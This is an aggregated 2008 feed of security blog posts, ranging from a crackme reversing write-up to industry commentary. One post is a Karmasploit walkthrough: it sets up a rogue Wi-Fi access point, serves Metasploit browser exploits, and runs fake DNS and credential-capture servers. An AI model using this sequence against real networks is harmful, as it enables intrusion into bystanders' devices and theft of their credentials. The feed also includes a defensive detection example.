Spliced feed for Security Bloggers Network |
Friday News and Notes [Digital Bond] Posted: 15 Aug 2008 06:59 AM CDT
|
SecuraBit Episode 8 [SecuraBit] Posted: 15 Aug 2008 06:01 AM CDT On this Episode of SecuraBit: Jason Mueller, Chris Gerling, Anthony Gartner.
Back from three week hiatus.
Defcon and BlackHat
Defcon Parties: Core Impact Party, EthicalHacker.net party, Cisco Party, Isight Party, I-hacked Party, StillSecure Freakshow Party
ChicagoCon: Boot Camps: Oct 27 - 31; Conference: Oct 31 - Nov 1: http://www.chicagocon.com/
Defcon Badges: Ran out of Badges on first day: http://search.twitter.com/search?q=Defcon+badges+out
TV-B-Gone built into the badges: http://www.hackaday.com/2008/08/05/defcon-16-badge-details-released/
Servo hacks the badges - http://edge.i-hacked.com/new-defcon16-details
Podcasters Meetup - [...]
This posting includes an audio/video/photo media file. |
F-Secure Khallenge Level 1 [ISIS Blogs] Posted: 15 Aug 2008 12:18 AM CDT Thanks to Aleksey and Phn1x for dealing with my constant stream of questions while reversing this. You’d think it was the first time I opened a debugger! The level 1 challenge was a binary that asked for input and, if your input was correct, printed out an e-mail address you could use to get the level 2 binary. The Khallenge is a contest of speed, so the first person to get to and beat level 3 wins. Unfortunately, I solved level 1 after the contest ended and the level 2 and 3 binaries aren’t online yet, so no prizes and no info on those.
The first thing I did was open the binary in a disassembler and try to get a general feel for it. This would help me develop an attack strategy. In IDA, you can easily identify that your input is being XOR’d almost a dozen times and with a global variable somewhere. It quickly overwhelmed me, so I took out a pen and paper and started writing things down. I also had lots of problems identifying exact addresses and byte offsets in IDA (I haven’t used it much before), so I switched to Immunity Debugger at this point. The first set of instructions your input needs to pass through are at addresses
if(strlen(input) != 4) fail(); else ...
The XORs start immediately after this check. After staring at it for a while, you will figure out that your input is being used as a key to decrypt a global variable located at 0x690030D0. This global variable becomes the answer e-mail. I wrote out the encrypted e-mail in a column and mapped the XOR’d input bytes to it. Here is that table (encompasses addresses 69001095 to 690010F6):
e-mail @ 0x690030D4
input @ 69003100
e-mail[0]: 0x07 XOR input[0]
e-mail[1]: 0x2E XOR input[1]
e-mail[2]: 0x35 XOR input[2]
e-mail[3]: 0x29 XOR input[3]
e-mail[4]: 0x70 XOR input[0]
e-mail[5]: 0x20 XOR input[1]
e-mail[6]: 0x76 XOR input[2]
e-mail[7]: 0x68 XOR input[3]
After all the XORs, the application starts to check the final values of 4 select bytes in the e-mail buffer.
e-mail[4]: 0x70 XOR input[0] == 0x32
e-mail[1]: 0x2E XOR input[1] == 0x61
e-mail[6]: 0x76 XOR input[2] == 0x30
e-mail[3]: 0x29 XOR input[3] == 0x79
If you do the XOR in reverse, you can find out the input they are looking for:
0x70 XOR 0x32 = input[0] = 0x42 = B
0x2E XOR 0x61 = input[1] = 0x4F = O
0x76 XOR 0x30 = input[2] = 0x46 = F
0x29 XOR 0x79 = input[3] = 0x50 = P
Run the executable, put BOFP into the prompt, all the XORs happen, all the checks pass, and the e-mail buffer decrypts to “Easy2o08.” Done! Thanks again Aleksey and Phn1x! |
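The table above is a repeating-key XOR: the 4-byte input is reused across the 8-byte buffer, and the binary checks only four decrypted positions. The script below is an added example (not code from the post or from F-Secure) that inverts those checks to recover the key, then verifies it the same way the binary does. The byte values are the ones listed in the post; the function names and the ValueError handling for conflicting constraints are my own additions.

```python
# Added example, not part of the original post: recover the expected
# input from the XOR constraints listed above and decrypt the buffer.

# Encrypted e-mail bytes at 0x690030D4, as listed in the post.
ENCRYPTED_EMAIL = bytes([0x07, 0x2E, 0x35, 0x29, 0x70, 0x20, 0x76, 0x68])
KEY_LEN = 4  # the binary rejects any input whose strlen() != 4

# Final-value checks the binary performs: buffer index -> expected byte.
CHECKS = {4: 0x32, 1: 0x61, 6: 0x30, 3: 0x79}


def xor_with_key(data, key):
    """Repeating-key XOR: byte i is XORed with key[i % len(key)]."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext, checks, key_len):
    """Invert the checks: key[i % key_len] = ciphertext[i] ^ expected[i].

    Raises ValueError if two checks disagree about one key byte or if
    some key byte is never constrained (then the key is not unique)."""
    key = [None] * key_len
    for index, expected in checks.items():
        k = index % key_len
        candidate = ciphertext[index] ^ expected
        if key[k] is not None and key[k] != candidate:
            raise ValueError(f"conflicting constraints for key byte {k}")
        key[k] = candidate
    if any(b is None for b in key):
        raise ValueError("not every key byte is constrained")
    return bytes(key)


def check_input(user_input):
    """Mirror of the binary's logic: length must be 4, then the selected
    decrypted bytes must match the hard-coded values."""
    if len(user_input) != KEY_LEN:
        return False
    decrypted = xor_with_key(ENCRYPTED_EMAIL, user_input)
    return all(decrypted[i] == v for i, v in CHECKS.items())


def solve():
    """Return (recovered input, decrypted buffer) as ASCII strings."""
    key = recover_key(ENCRYPTED_EMAIL, CHECKS, KEY_LEN)
    if not check_input(key):
        raise RuntimeError("recovered key does not pass the binary's checks")
    return key.decode("ascii"), xor_with_key(ENCRYPTED_EMAIL, key).decode("ascii")


if __name__ == "__main__":
    key, email = solve()
    print(f"input: {key}  decrypted buffer: {email}")
```

Because only four of the eight buffer positions are checked, the other four bytes are decrypted "for free" once the key is known; that is why solving the checks yields the whole e-mail address rather than just the password.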
This is a normal upgrade for me… [BumpInTheWire.com] Posted: 14 Aug 2008 11:51 PM CDT Wow…getting our LANsight Security Management Appliances upgraded has been less than easy. Luckily El Sidekick considered this a normal upgrade for him. I can always count on him to find the good in most anything. We did manage to get them upgraded to the 5.1 code tonight (just finished at 11:30 tonight) by stepping up to a code level between what we were running and the latest version. The first opinion of the new interface is that it is a definite improvement. The dashboard has more/better detail as to what has actually been going on in the environment. One thing I would like to see, which I don’t think the previous versions had either, is the hostname displayed on the dashboard somewhere. Having two sites with two different management appliances, sometimes it can get confusing when looking at both of them at the same time. In other news…Alan is back! Sounds like he’s been through quite the ordeal. Sit down and have a cyber-beer. You deserve it! |
Posted: 14 Aug 2008 08:10 PM CDT Yeah, the posts have been coming slow lately but some of you may have heard about a little event going on in China called the Olympics. Chinese hackers watching sporting events, worried about foreign hackers attacking them…my world is completely upside down. The boys and girls from 3800hk.com, the largest Chinese hacker training site, take over 20 of their “employees” out to enjoy the games. Plus, they love them some Mr. Yao Ming: More pictures of their adventure here if you are interested…but pretty much the same as these. |
Bye-Bye Passwords - Maybe? [NovaInfosecPortal.com] Posted: 14 Aug 2008 05:47 PM CDT I came across an interesting New York Times story by Randall Stross over the weekend that discusses how we should be replacing passwords with information cards and how so-called single sign-on (SSO) services (e.g., OpenID and I’m sure any commercial product SSO efforts as well) just don’t add the security we need. Here are the relevant snippets from the article:
”The solution urged by the experts is to abandon passwords - and to move to a fundamentally different model, one in which humans play little or no part in logging on. Instead, machines have a cryptographically encoded conversation to establish both parties’ authenticity, using digital keys that we, as users, have no need to see. In short, we need a log-on system that relies on cryptography, not mnemonics. As users, we would replace passwords with so-called information cards, icons on our screen that we select with a click to log on to a Web site. The click starts a handshake between machines that relies on hard-to-crack cryptographic code.”
“We won’t make much progress on information cards in the near future, however, because of wasted energy and attention devoted to a large distraction, the OpenID initiative. OpenID promotes “Single Sign-On”: with it, logging on to one OpenID Web site with one password will grant entrance during that session to all Web sites that accept OpenID credentials. OpenID offers, at best, a little convenience, and ignores the security vulnerability inherent in the process of typing a password into someone else’s Web site.”
Strangely enough, Microsoft seems to be involved in this new information card technology. It sounds a lot like Microsoft’s well-known CardSpace technology. As a matter of fact, Microsoft is part of a new Information Card Foundation (ICF) along with other heavyweights such as Equifax, Google, Novell, Oracle and PayPal. But then Microsoft is also a supporter of OpenID. 
How ironic… The only issue I see with these information cards is that they are desktop icons that you click to log in, as described in the New York Times story. When I’m logging into Windows at the beginning of the day, what do I do then? I won’t have access to these information card icons yet. Passwords anyone? Plus this doesn’t alleviate the problem of computers being infected with malware. If I can click it, a Trojan or virus can too. I agree with all the points about OpenID and other SSO efforts… but they’re just so darn convenient! There are a lot of questions that need to be addressed here and I’m sure we’ll all be learning a lot more about this technology as it evolves. What do you think about this new authentication technology? Does your organization have plans to replace passwords with information cards? Here’s a link to the New York Times article. |
Posted: 14 Aug 2008 05:40 PM CDT There’s been a bit of debate on the blogs recently over the role of analysts, and how they pay their bills. It started with the Hoff, and Alan Shimel followed up (no link right now due to Alan’s blog issues). I know Chris wasn’t calling me out on this one (because he told me), but I do recognize I put a lot of content out there that people trust to help make decisions, and it’s only fair they know of any potential conflicts of interest I might have. I’m not going to get into a big debate over the role of analysts in the IT industry. I think the good ones offer tremendous value, but I’m clearly biased. Where I’m not biased is in my positions. No matter who pays the bills, I recognize that most of my value in the security world is my objectivity. Everything I write is for the end user, even if a piece is sponsored by a vendor or written internally for an investor. As soon as I forget that, my career is over. It’s one thing for me to claim that, and another for you to believe it. I don’t assume you’ll take me at my word, and that’s why I throw everything out here on the blog and leave it for public comment. If you think I’m biased, call me on it. I don’t think I’ve ever deleted a comment, other than spam and personal insults. Insulting argument is okay, but I decline to host pointless insults — there are lots of other places for that, and this is *my* (our) soapbox — you can set up your own website or find another board if you just want to flame online; there’s no shortage of venues. We also encourage vendors to comment, as long as they identify themselves clearly if it’s on something related to their offerings. It’s also only fair you know who pays my bills, and my policies on papers and webcasts. Right now about 85% of our income is from vendors, with the remaining 15% split between investment clients, end users, and media companies (magazines/conferences). 
We’re expensive for consultants, and don’t typically engage in long-term projects, which cuts out a lot of paid end user business, although we do a ton of (short) free calls, emails, and meetings when I’m traveling. As for papers and webcasts, the rules are we (Adrian and myself) will work with a vendor on a topic, but they have no input on the content. To make this work we give them detailed outlines of what they can expect before we write it, and all contracts are written so that if they don’t like the content, we go our separate ways and we won’t charge them. In all cases we (Securosis) own the content and only license it to the vendors for (usually) a year. And yes, I’ve walked away from deals, although we haven’t had one fall apart after the draft was written, since we prefer to work out any conflicts before we start. Also, all the content appears first on the blog for public input- this is the best way we can think of to be transparent. So who pays the bills? I can’t talk about our strategy clients, but we’ve done public work (papers/webcasts/speaking) with all of the following vendors (I’m assuming you don’t care about the media companies):
There aren’t any surprises here- I’ve announced all those papers, webcasts, and such here on the blog already, along with who the sponsor was. No, I can’t talk about all our clients, but if they aren’t on that list, they’ve never sponsored any content. Another thing we do to balance objectivity is work with competitors- we won’t engage in contracts that exclude us from working with competitors. This was all already public, so I’m not giving away any big secrets. Also, don’t take this as a “look how great we are!” post; we’re doing this for transparency, not marketing. We’ve also worked with SANS, CMP Media, TechTarget, some large financials (doesn’t everyone?), and a few investment types. That doesn’t count the end users we don’t charge. That’s it. If you think we’re biased, call us on it and we won’t delete the comment. Our goal is to be as open as possible so you know where the information you’re reading comes from. Do we push some technologies? Yep, because we think they can help. We’ve definitely turned away work for things we don’t believe in. -rich |
DAVIX 1.0.1 Officially Launched [iplosion security] Posted: 14 Aug 2008 05:39 PM CDT After months of building and testing, the long anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exciting moment for me and I am curious to see how the product is received by the audience. So far the ISO image has been downloaded at least 600 times from our main distribution server. Downloads from the mirrors are not accounted for. Additionally, Raffael Marty’s book Applied Security Visualization is now available in print. DAVIX was built with this particular book in mind. If you are looking for a methodology and not just a workable tool set, then the book is what you are looking for. The book covers all steps from the very basics to complete case studies and contains many hands-on examples. Therefore, the book together with DAVIX 1.0.1 is the perfect match for getting you started with security visualization. For a preview of the book’s content check out the rough cuts version. All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage. I wish you happy visualizing! |
Blog Moved! [Security Uncorked] Posted: 14 Aug 2008 02:22 PM CDT Blog Moved! The SecurityUncorked blog has moved to a new hosting location. The domains www.SecurityUncorked.com and .net will still take you to the blog site, but please discontinue use of this link (http://securityuncorked.squarespace.com). For now, this old location will remain active until all/most incoming links have been updated, but please be sure to update your favorites or links to www.SecurityUncorked.com. Thanks! jj |
First Amazon Review for Applied Security Visualization Book [Raffy - Security Data Visualization] Posted: 14 Aug 2008 02:21 PM CDT I just saw the first Amazon review for my book. I just don’t understand why the person only gave it four stars, instead of five. Just kidding. Thanks for the review! Keep them coming! |
Playing with Karmasploit Part 1 [Carnal0wnage Blog] Posted: 14 Aug 2008 01:53 PM CDT HD Moore released some documentation to get karmasploit working with the framework. First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch (I used the 2nd patch), so apply that before you make/make install. You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue. Let's do our aireplay-ng test to see if things are working:
root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...
19:55:44 Injection is working!
19:55:46 Found 5 APs
19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
19:55:52 0/30: 0%
19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%
19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
19:56:03 5/30: 16%
19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
19:56:09 0/30: 0%
19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%
Looks like we are good. Now just follow the steps in the documentation: I installed dhcpd3 and set up my conf file, did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward. With all the config files set up it's pretty easy to get things going.
root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet"
**You get the idea... airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this is from the karmasploit documentation):
root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0
root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400
root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800
After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.
root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net
After that we run our karma.rc file from within msfconsole. 
root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 5353
SRVPORT => 5353
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 53
SRVPORT => 53
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >
Next post we'll see karmasploit in action. |
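The airbase-ng output above shows the behaviour a wireless IDS can key on: a single BSSID (00:19:7E:8E:72:87) accepting open associations to whatever ESSID each client probed for ("tmobile", then "LodgeNet"). A legitimate access point serves a fixed ESSID per BSSID, so a sensor that records (bssid, essid) pairs from probe responses and associations can flag any BSSID seen serving several ESSIDs. The script below is an added, defender-side example and is not code from the post, from aircrack-ng or from the karmasploit documentation; the sensor log format is hypothetical and the records are constructed, reusing the MAC addresses and ESSIDs that appear in the post.

```python
# Added example, not part of the original post: flag a "promiscuous"
# access point (one BSSID answering for many ESSIDs) from sensor records.
import re
from collections import defaultdict

# Constructed sensor log in a hypothetical format (not any real tool's
# output). The first two records mirror the associations in the post; the
# last two model a normal AP serving one ESSID to several clients.
SENSOR_LOG = """\
03:01:34 ASSOC bssid=00:19:7E:8E:72:87 client=00:21:06:41:CB:50 essid="tmobile" enc=open
03:04:19 ASSOC bssid=00:19:7E:8E:72:87 client=00:1B:77:23:0A:72 essid="LodgeNet" enc=open
03:05:02 ASSOC bssid=00:13:19:5F:D1:D0 client=00:13:E8:A8:B1:93 essid="stayonline" enc=open
03:05:40 ASSOC bssid=00:13:19:5F:D1:D0 client=00:90:4B:C1:61:E4 essid="stayonline" enc=open
"""

LINE_RE = re.compile(
    r'^(?P<time>\d\d:\d\d:\d\d) ASSOC bssid=(?P<bssid>[0-9A-F:]{17}) '
    r'client=(?P<client>[0-9A-F:]{17}) essid="(?P<essid>[^"]*)" enc=(?P<enc>\w+)$'
)


def parse_log(text):
    """Turn sensor lines into dicts. Lines that do not match the format
    are skipped so one malformed record cannot stop the detector."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def essids_per_bssid(records):
    """Map each BSSID to the set of ESSIDs it has been seen serving."""
    seen = defaultdict(set)
    for r in records:
        seen[r["bssid"]].add(r["essid"])
    return seen


def find_promiscuous_aps(records, min_essids=2):
    """Return {bssid: sorted ESSID list} for every BSSID serving at least
    min_essids distinct ESSIDs, the 'answer every probe' signature.
    Multi-SSID controllers normally use a distinct BSSID per SSID, but an
    allowlist of known BSSIDs is still advisable in a real deployment."""
    return {
        bssid: sorted(essids)
        for bssid, essids in essids_per_bssid(records).items()
        if len(essids) >= min_essids
    }


def affected_clients(records, bssid):
    """Clients that associated in the clear to a flagged BSSID, so the
    responder knows which devices to follow up on."""
    return sorted({r["client"] for r in records
                   if r["bssid"] == bssid and r["enc"] == "open"})


if __name__ == "__main__":
    recs = parse_log(SENSOR_LOG)
    for bssid, essids in find_promiscuous_aps(recs).items():
        print(f"ALERT {bssid} serves {len(essids)} ESSIDs: {essids}")
        print("  clients:", affected_clients(recs, bssid))
```

On the constructed records this reports only 00:19:7E:8E:72:87, with both clients listed; the "stayonline" AP serves a single ESSID and stays quiet. Clients that auto-join remembered open networks are the ones exposed here, which is why disabling automatic reconnection to open SSIDs and preferring authenticated (802.1X) networks is the usual endpoint-side mitigation.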
Over 50% of client systems are EV aware [Tim Callan's SSL Blog] Posted: 14 Aug 2008 12:48 PM CDT We recently hit a very cool milestone, which is that over half the client systems in use today are capable of distinguishing between Extended Validation SSL Certificates and traditional certificates. In other words, the combined market share of IE7, IE8 (very small), Firefox 3, and Opera 9.5 adds up to in excess of 52% of browsers in use. What's especially cool about that is it's an increase of almost 3% in a single month, which is quite a growth trajectory. People have been writing about this milestone, such as this blogger at DaniWeb. The blogger questions how well six or seven thousand online businesses compare to the millions of Web sites that are out there, and I think that's a question that deserves an answer. It's important to distinguish between the mass of Web sites out there that are strictly publishing content and the considerably smaller subset that actually engage in some sort of online business. EV SSL today very much is focused on those sites where consumers are asked to share sensitive information with a business, something like an account login or a credit card number or personally identifiable information. These are the pieces of information that criminals want to steal, and these are the sites that phishing and malware and other attacks are directed at. A consumer doesn't need protection from phishing attacks when visiting your personal blog or Star Wars fan site or even your company's brochureware site. It's only where the actual commerce takes place. Therefore, you shouldn't consider the full footprint of Web sites in the world but rather this subset that is conducting business. I don't know exactly how to measure that number, but I expect it's orders of magnitude smaller than the number of total Web sites out there. 
Now, there's an implication in this posting that maybe in the long run sites without commerce taking place will still want an EV cert in order to demonstrate their genuine identity. I think that is a possibility down the road, but today we're really focused on those sites where there is information to protect. |
UPDATES GALORE! or, THE PRONOUN “WE” MEANS YOU AND ME! [RiskAnalys.is] Posted: 14 Aug 2008 12:29 PM CDT Originally Posted: 13 Aug 2008 10:24 AM CDT Reposted due to server issues. So much traveling, so little blogging. Sorry everyone. I've gotta say first that I really enjoyed meeting readers and friends of the blog this past two weeks. Today, allow me to update you on FAIR and the movement towards a formal, open standard. There's a couple of cool things going on in our little risk-world. First, The Open Group Security Forum continues to move towards a formal adoption of FAIR. WHAT DO YOU MEAN "WE" - YOU GOT A STANDARDS BODY IN YOUR POCKET OR SOMETHING? Our meeting in Chicago a few weeks ago was great, but also slightly disturbing for me. I got pronoun-confusion syndrome. I'm used to using the "we" pronoun to refer to RMI, or Jack and myself as we vet the models. So without even thinking I would say "we have been looking at how loss occurs, and may want to change the model some" and The Open Group Members freaked out (rightfully so). Adrian Seccombe gently reminded me that the "we" was now the Security Forum, and that "we" didn't go changing things at will without vetting against each other. Man I love this stuff. I get to run our thoughts and ideas past some great folks now - you know, those smart people who tend to have really complex problems and are trying hard to solve them. Formal Adoption: Soon, Very Soon Now Formal Adoption basically means we've made this document, everyone is close to saying that they generally like it, and once that finally happens then "bam", we're ready to move onward and upward with better things (see Cookbooks, below). We've got a couple of changes to the current document that have been requested that aren't a big deal. For example, one request is that we make some statement about general applicability of FAIR to risk domains outside of the IT realm. 
But once additions like that and others are done, this long process should be complete. New Document Moving Towards Public Release: We've got a basic document that should be public in the next few weeks on "What Makes a Good Risk Assessment Methodology" - written by yours truly and Jack. It's a very high-level document, and serves two purposes:
When this doc is deemed ready for public consumption I'll be sure to post on this blog here. COOKBOOKS, EUROPEAN AGENCIES, AND, IRON CHEF "RISK" - WHOSE CUISINE WILL REIGN SUPREME? One interesting thing that came up in the Chicago meeting was that ENISA (The European Network and Information Security Agency) developed a very nice document that reviewed something like 18 different risk assessment methodologies against their Criteria for Goodness. FAIR was one of the ones they reviewed, and we (the royal "we" used there to include all us FAIR-Folk) did awfully well. Things of interest:
So The Open Group Security Forum decided that though we could create a new document and totally p0wn any future ENISA bake-off, there wasn't much demand for the development of that documentation by the membership - a point which was made quite apparent at the beginning of the discussion when one large European company CISO asked "What's ENISA?" Relevancy is everything, I suppose. But that second item up there - the one about helping rather than competing with other "risk assessment methodologies" - really struck a chord. So "we" (The Security Forum) are going to develop some "Cookbooks" that basically are high-level documents that say "If you want to use FAIR with (OCTAVE/COSO/CoBIT/Whatever) here's how it fits, makes it better, and improves your life." I'm pretty excited about these, and our first document looks like it's going to be COSO integration. THE OPEN GROUP SECURITY FORUM - THEY'RE A TRUSTING BUNCH (WITH QUALIFICATION, OF COURSE) Finally, many people have asked me "Why work with The Open Group?" There are many reasons, to be sure, but I will give you one example. Members of the Security Forum there are not only great at vetting the model and getting consensus on risk and risk factors - but they're quick to start applying. So in Chicago, I thought I'd be talking about FAIR and the standard and fighting groupthink. Nope. Not at all. In fact, the forum members spent more time suddenly discussing use of FAIR in a new Trust Model they're developing. So all of a sudden, I'm part of a new and exciting project to develop a Trust Model - how cool is that? While formal adoption of the Trust Model will be necessarily long and deliberate - the collaboration and development is happening much faster than I can keep up with. But if you all will allow me, it will help me get my head around it all by blogging about it later this week. So be prepared to read about me dealing in "Trust" a little bit. |
I'm back! [StillSecure, After All These Years] Posted: 14 Aug 2008 12:12 PM CDT It has certainly been an interesting week. If there is anything else you want to know about me that has not already been posted, please feel free to send me your questions. As most of you know, on Sunday morning my blog was hijacked/hacked as well as my yahoo mail address and the domain for this blog. A lot of my personal information from these sources was posted on a public message list, along with some particularly hateful, ignorant, anti-Semitic ranting. This event, while traumatic, has also resulted in some positives. First of all let me say that I cannot go into a lot of the details of how this took place, as I am working with the authorities in this matter. Secondly, let me say that all of the information exposed was my own personal information. StillSecure infrastructure was not pierced or exposed at all, though the StillSecure SAT team treated this as a major breach and pulled out all of the stops in investigating and protecting our corporate infrastructure. All of the above notwithstanding, it was not easy. Of course part of me would like to just be in a room with some of the people (and I use that term loosely) who committed this crime and take care of this, but that is probably not going to happen (one can hope though). In some way I feel that in order to make steel, iron has to be put through the fire. This event has resulted in steel being made. Where before I viewed security as a business that I was in, security from here on in will be a much more passionate endeavor for me. In many ways this has made me truly a security person. You will see a much deeper commitment by me in keeping the slime of the world from being successful. I am going to do everything I can to make myself, my family and all of us more secure. Security for me has gone from a business to a way of life. 
